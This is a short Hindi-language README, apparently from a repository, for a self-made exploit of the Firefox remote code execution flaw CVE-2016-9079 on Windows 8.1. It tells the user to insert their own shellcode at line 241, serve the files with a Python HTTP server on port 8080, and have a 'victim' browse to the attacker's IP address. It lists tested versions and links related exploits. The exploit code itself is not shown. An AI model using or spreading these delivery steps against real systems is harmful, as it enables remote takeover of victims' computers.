
फ़ायरफ़ॉक्स RCE CVE-2016-9079 के लिए मैनुअल एक्सप्लॉइट, अनुकूलन योग्य शेलकोड के साथ, कमजोर विंडोज सिस्टम पर दूरस्थ कोड निष्पादन के लिए HTTP के माध्यम से परोसा जाता है।
यह https://www.exploit-db.com/exploits/41151 का एक मैनुअल एक्सप्लॉइट है, Windows 10 के लिए एक और मौजूद है (https://github.com/soham23/firefox-rce-nssmil) लेकिन यह Windows 8.1 पर काम नहीं करता था इसलिए मैंने अपना बनाया।
आपको पंक्ति 241 को अपने स्वयं के शेलकोड से संशोधित करना होगा। इस पंक्ति के ऊपर एक उदाहरण है।
रिपॉजिटरी डाउनलोड करें और एक सर्वर शुरू करें। Python सर्वर का उपयोग करना ठीक काम करता है।
python3 -m http.server 8080
अपने पीड़ित पर http://<attacker_ip>:8080/ पर ब्राउज़ करें और यह काम करना चाहिए।
Windows 8.1 Entreprise x64 पर firefox 38 का उपयोग करके परीक्षण किया गया।